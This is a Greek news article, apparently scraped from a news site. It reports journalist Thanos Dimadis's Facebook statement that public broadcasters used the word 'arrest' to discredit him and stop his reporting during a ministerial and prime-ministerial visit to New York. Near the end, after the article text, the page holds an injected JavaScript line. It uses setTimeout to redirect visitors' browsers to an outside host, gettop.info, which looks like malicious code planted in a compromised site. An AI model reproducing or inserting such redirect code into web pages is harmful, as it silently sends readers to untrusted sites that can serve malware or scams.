Ο Θάνος Δημάδης για τη «σύλληψή» του και το παρασκήνιο πίσω από την περούκα

0
32

 

Για προσπάθεια αποκλεισμού του από την ενημέρωση καθ όλη τη διάρκεια της επίσκεψης των υπουργού Επικρατείας και πρωθυπουργού στη Νέα Υόρκη κάνει λόγο ο Θάνος Δημάδης σε ένα μακροσκελές σχόλιο που ανήρτησε στον προσωπικό του λογαριασμό στο facebook.

Όπως γράφει συγκεκριμένα ο κ. Δημάδης: «Οι δημοσιογράφοι στα δημόσια μέσα ενημέρωσης του ΑΠΕ και της ΕΡΤ, φτιάχνουν ένα γαϊτανάκι μιας πολύ καλοστημἐνης προπαγάνδας που την ονομάσαν ανταπόκριση του ΑΠΕ με στόχο να εκβιάσουν την σιωπή μου, πλήττοντας την αξιοπιστία μου, με συνέπεια να με αποκλείσουν από την Εφημερίδα των Συντακτών και το Periodista.gr, και κυρίως να μην προβώ σε κανένα ρεπορτάζ καθ᾽όλη την διάρκεια της επίσκεψης του Υπουργού Επικρατείας κ. Παππά και του Πρωθυπουργού κ. Τσίπρα στη Νέα Υόρκη».

Ο Θάνος Δημάδης σχολιάζει επίσης ότι η «σύλλληψή του είναι προσπάθεια να ανκόψει τη δημοσιογραφική του λειτουργία γράφοντας: «Η «σύλληψη» με όλα τα συμπαραμαρτούντα που αυτή συνυποδηλώνει στο δελτίο τύπου του ΑΠΕ, είναι η κομβική λέξη με την οποία επιχειρείται να με απαξιώσουν ως δημοσιογράφο-ανταποκριτή, να με εξευτελίσουν με την αρωγή του εγχώριου δημοσιογραφικού συστήματος που εξυπηρετεί τα συμφέροντα της κυβέρνησης και να ανακόψουν την οποιαδήποτε δημοσιογραφική μου λειτουργία«.

Αναλυτικά

  setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here